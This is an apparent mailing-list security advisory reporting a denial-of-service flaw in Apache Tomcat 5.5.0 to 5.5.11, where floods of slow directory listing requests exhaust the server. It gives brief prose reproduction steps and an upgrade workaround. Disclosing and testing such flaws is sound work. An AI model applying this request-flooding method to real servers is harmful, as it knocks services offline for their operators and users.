Apache Tomcat is the famous servlet container for Java Servlet and JSP technologies released under ASL. Version 5.5.x is intented for servlet/jsp specification 2.4/2.0. More information on http://tomcat.apache.org/ Description: Many time consuming directory listing requests can cause a denial of service. Detection/PoC: On Linux: Vulnerable version tested are 5.5.0 to 5.5.11. 5.5.12 and 5.0.28 seems not to be impacted. A easy way to test : -Download Tomcat package from Tomcat archive -Unpack it, use default configuration -In webapps example dir, add some empty files (enough for the dir listing request to be long) -Thread many listing access on this directory Workaround: Upgrade to linux version 5.5.12 PS: Secunia team have done more test available on http://secunia.com/advisories/17416/ David Maciejak -------------------------------------------------------------------------------- KYXAR.FR - Mail envoyé depuis http://webmail.kyxar.fr
